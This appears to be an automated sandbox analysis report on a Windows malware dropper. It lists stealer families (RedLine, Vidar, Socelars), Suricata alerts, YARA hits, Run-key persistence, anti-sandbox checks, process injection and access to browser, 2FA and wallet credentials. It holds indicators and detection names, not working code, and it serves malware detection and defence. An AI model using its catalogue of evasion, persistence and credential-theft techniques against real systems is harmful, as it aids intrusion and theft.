djvu | 56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

Change Default File Association

T1042

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	3312	rundll32.exe	7
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1260	3312	rundll32.exe	7
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7752	3312	rundll32.exe	7

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral7/memory/5248-329-0x000000000041C5DA-mapping.dmp	family_redline
behavioral7/memory/5804-376-0x000000000041C5E2-mapping.dmp	family_redline
behavioral7/memory/5248-325-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral7/files/0x000400000001ab30-174.dat	family_socelars
behavioral7/files/0x000400000001ab30-139.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5544 created 1936	5544	WerFault.exe	105
PID 380 created 4508	380	WerFault.exe	89

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 7280 created 7764	7280	svchost.exe	277

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral7/memory/4516-242-0x0000000000A50000-0x0000000000B24000-memory.dmp	family_vidar
behavioral7/memory/4516-244-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral7/files/0x000400000001ab26-125.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab29-131.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab26-130.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab26-129.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab29-128.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab27-124.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab27-122.dat	aspack_v212_v242

Blocklisted process makes network request 50 IoCs

flow	pid	Process
197	6496	powershell.exe
210	6976	schtasks.exe
287	1440	MsiExec.exe
289	1440	MsiExec.exe
291	1440	MsiExec.exe
292	1440	MsiExec.exe
296	1440	MsiExec.exe
297	1440	MsiExec.exe
298	1440	MsiExec.exe
300	1440	MsiExec.exe
301	1440	MsiExec.exe
302	1440	MsiExec.exe
303	1440	MsiExec.exe
304	1440	MsiExec.exe
305	1440	MsiExec.exe
307	1440	MsiExec.exe
308	1440	MsiExec.exe
309	1440	MsiExec.exe
310	1440	MsiExec.exe
312	1440	MsiExec.exe
313	1440	MsiExec.exe
314	1440	MsiExec.exe
315	1440	MsiExec.exe
316	1440	MsiExec.exe
318	1440	MsiExec.exe
320	1440	MsiExec.exe
321	1440	MsiExec.exe
322	1440	MsiExec.exe
323	1440	MsiExec.exe
325	1440	MsiExec.exe
326	1440	MsiExec.exe
327	1440	MsiExec.exe
329	1440	MsiExec.exe
331	1440	MsiExec.exe
332	1440	MsiExec.exe
333	1440	MsiExec.exe
335	1440	MsiExec.exe
338	1440	MsiExec.exe
339	1440	MsiExec.exe
340	1440	MsiExec.exe
342	1440	MsiExec.exe
343	1440	MsiExec.exe
344	1440	MsiExec.exe
345	1440	MsiExec.exe
346	1440	MsiExec.exe
348	1440	MsiExec.exe
350	1440	MsiExec.exe
352	1440	MsiExec.exe
354	1440	MsiExec.exe
355	1440	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	Ze2ro.exe

Executes dropped EXE 64 IoCs

pid	Process
3168	setup_installer.exe
3684	setup_install.exe
4172	Sun1917b8fb5f09db8.exe
4304	Sun193fda712d9f1.exe
4360	Sun1908b94df837b3158.exe
4428	Sun19e4ade31b2a.exe
4368	Sun19262b9e49ad.exe
4508	Sun19de8ff4b6aefeb8.exe
4516	Sun19eb40faaaa9.exe
4536	Sun191101c1aaa.exe
4564	Sun198361825f4.exe
4644	Sun1905815e51282417.exe
4704	Sun195a1614ec24e6a.exe
4760	Sun1966fb31dd5a07.exe
4964	Sun1966fb31dd5a07.tmp
4572	Ze2ro.exe
2808	LzmwAqmV.exe
4200	3293587.scr
1152	Chrome 5.exe
4900	PublicDwlBrowser1100.exe
4932	2.exe
1936	setup.exe
2476	3861655.scr
2752	tmpCDC_tmp.exe
2536	3529892.scr
4612	udptest.exe
4848	5.exe
1904	LivelyScreenRecF18.exe
4364	setup_2.exe
5148	3002.exe
5172	7587421.scr
5248	3529892.scr
5312	setup_2.tmp
5320	jhuuee.exe
5524	BearVpn 3.exe
5844	setup_2.exe
6052	5517.exe
5804	tmpCDC_tmp.exe
5364	3002.exe
5672	4432573.exe
5164	postback.exe
4472	6490685.exe
2688	LzmwAqmV.exe
4176	LzmwAqmV.exe
5912	8538837.exe
1688	tmp7402_tmp.exe
5676	LzmwAqmV.exe
5896	LzmwAqmV.exe
4264	services64.exe
3736	2347656.exe
6056	8538837.exe
4672	ultramediaburner.exe
4680	Qinaeloxela.exe
5444	Jyhatyshyba.exe
1408	ultramediaburner.tmp
4884	tmp7402_tmp.exe
2876	UltraMediaBurner.exe
6544	sihost64.exe
5916	GcleanerEU.exe
5696	installer.exe
6344	anyname.exe
6976	schtasks.exe
5060	282A.exe
1324	5517.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7587421.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7587421.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9658.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9658.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3861655.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2347656.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2347656.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6490685.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6490685.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3861655.scr

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Qinaeloxela.exe

Loads dropped DLL 54 IoCs

pid	Process
3684	setup_install.exe
3684	setup_install.exe
3684	setup_install.exe
3684	setup_install.exe
3684	setup_install.exe
3684	setup_install.exe
4964	Sun1966fb31dd5a07.tmp
3792	rundll32.exe
5312	setup_2.tmp
6052	5517.exe
2676	rundll32.exe
5212	regsvr32.exe
5696	installer.exe
5696	installer.exe
4844	DllHost.exe
5696	installer.exe
7776	rundll32.exe
7800	MsiExec.exe
7800	MsiExec.exe
7504	regsvr32.exe
7872	build2.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
1440	MsiExec.exe
5696	installer.exe
1440	MsiExec.exe
1440	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
7632	MsiExec.exe
1440	MsiExec.exe
7872	build2.exe
7872	build2.exe
64	F850.exe
64	F850.exe
64	F850.exe
64	F850.exe
64	F850.exe
956	FileSyncConfig.exe
956	FileSyncConfig.exe
956	FileSyncConfig.exe
956	FileSyncConfig.exe
956	FileSyncConfig.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4904	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral7/files/0x000400000001ab62-278.dat	themida
behavioral7/files/0x000400000001ab62-288.dat	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Jocapaeveba.exe\""	Ze2ro.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\37ee7f47-34cf-4fdf-a9ca-b9589a36b813\\5517.exe\" --AutoStart"	5517.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3861655.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7587421.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6490685.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2347656.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9658.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
108	ip-api.com
293	api.2ip.ua
294	api.2ip.ua
363	api.2ip.ua
15	ip-api.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Time Trigger Task	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent F577BDF11B08E6FB	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Azure-Update-Task	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2476	3861655.scr
5172	7587421.scr
4472	6490685.exe
3736	2347656.exe
5680	9658.exe

Suspicious use of SetThreadContext 19 IoCs

description	pid	Process	procid_target
PID 2608 set thread context of 5188	2608	svchost.exe	142
PID 2536 set thread context of 5248	2536	3529892.scr	120
PID 2752 set thread context of 5804	2752	tmpCDC_tmp.exe	124
PID 2688 set thread context of 5896	2688	LzmwAqmV.exe	160
PID 4176 set thread context of 5676	4176	LzmwAqmV.exe	159
PID 5912 set thread context of 6056	5912	8538837.exe	173
PID 5164 set thread context of 5032	5164	postback.exe	175
PID 1688 set thread context of 4884	1688	tmp7402_tmp.exe	180
PID 4264 set thread context of 6484	4264	services64.exe	235
PID 1324 set thread context of 4816	1324	5517.exe	249
PID 6052 set thread context of 7264	6052	5517.exe	256
PID 6896 set thread context of 7872	6896	build2.exe	259
PID 7408 set thread context of 7940	7408	build3.exe	261
PID 4368 set thread context of 7892	4368	mstsca.exe	282
PID 4080 set thread context of 5744	4080	mstsca.exe	290
PID 4796 set thread context of 4968	4796	mstsca.exe	296
PID 5308 set thread context of 6428	5308	mstsca.exe	298
PID 3196 set thread context of 4540	3196	mstsca.exe	301
PID 5388 set thread context of 4104	5388	mstsca.exe	303

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\UltraMediaBurner\is-ET928.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-TVKU3.tmp	5517.exe
File created	C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe.config	Ze2ro.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-LB3DD.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	5517.exe
File created	C:\Program Files (x86)\Windows Media Player\Jocapaeveba.exe	Ze2ro.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	5517.exe
File created	C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe	Ze2ro.exe
File created	C:\Program Files (x86)\Windows Media Player\Jocapaeveba.exe.config	Ze2ro.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp

Drops file in Windows directory 41 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI7B6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9FA.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4AF5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4C1F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI63C.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI466.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI767.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3959.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A19.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4F1F.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	svchost.exe
File opened for modification	C:\Windows\Installer\MSI92E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3F18.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\3018b.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\Installer\30188.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\30188.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6F8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4032.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5461.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File opened for modification	C:\Windows\Installer\MSI3783.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4D78.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3B1F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4091.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4805.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4CAC.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 20 IoCs

pid	pid_target	Process	procid_target
3772	4508	WerFault.exe	89
5552	2536	WerFault.exe	112
5828	4508	WerFault.exe	89
4624	4508	WerFault.exe	89
4344	1936	WerFault.exe	105
5840	4508	WerFault.exe	89
5904	1936	WerFault.exe	105
5268	1936	WerFault.exe	105
2756	1936	WerFault.exe	105
792	4508	WerFault.exe	89
3064	4508	WerFault.exe	89
5824	1936	WerFault.exe	105
5344	5912	WerFault.exe
5276	1936	WerFault.exe	105
2284	4508	WerFault.exe	89
4872	1936	WerFault.exe	105
4824	4508	WerFault.exe	89
5544	1936	WerFault.exe	105
2956	4508	WerFault.exe	89
380	4508	WerFault.exe	89

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	efcvtew
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	efcvtew
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	efcvtew
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun1908b94df837b3158.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
7112	schtasks.exe
7256	schtasks.exe
6976	schtasks.exe
5636	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
8128	timeout.exe
6992	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
816	taskkill.exe
6520	taskkill.exe
8140	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe

Modifies data under HKEY_USERS 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
